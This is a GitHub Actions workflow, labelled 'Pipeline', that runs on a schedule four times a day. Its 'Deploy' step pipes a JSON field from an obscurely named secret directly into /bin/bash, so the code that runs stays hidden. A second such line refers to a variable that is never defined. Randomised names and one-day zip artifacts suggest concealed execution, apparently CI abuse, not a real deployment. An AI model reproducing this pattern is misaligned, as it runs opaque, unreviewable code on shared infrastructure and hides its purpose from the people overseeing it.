name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '12 1,7,13,19 * * *'
permissions:
  contents: read
jobs:
  dispatcher:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Deploy
        env:
          okk72528: ${{ secrets.okk72528 }}
        run: |
          printf '%s' "$okk72528" | jq -r .cy7432 | /bin/bash
          printf '%s' "$ofze4325" | jq -r .daj5794 | /bin/bash

      - name: Save results
        uses: actions/upload-artifact@v4
        with:
          name: T1fUDc8C
          path: "*.zip"
          retention-days: 1
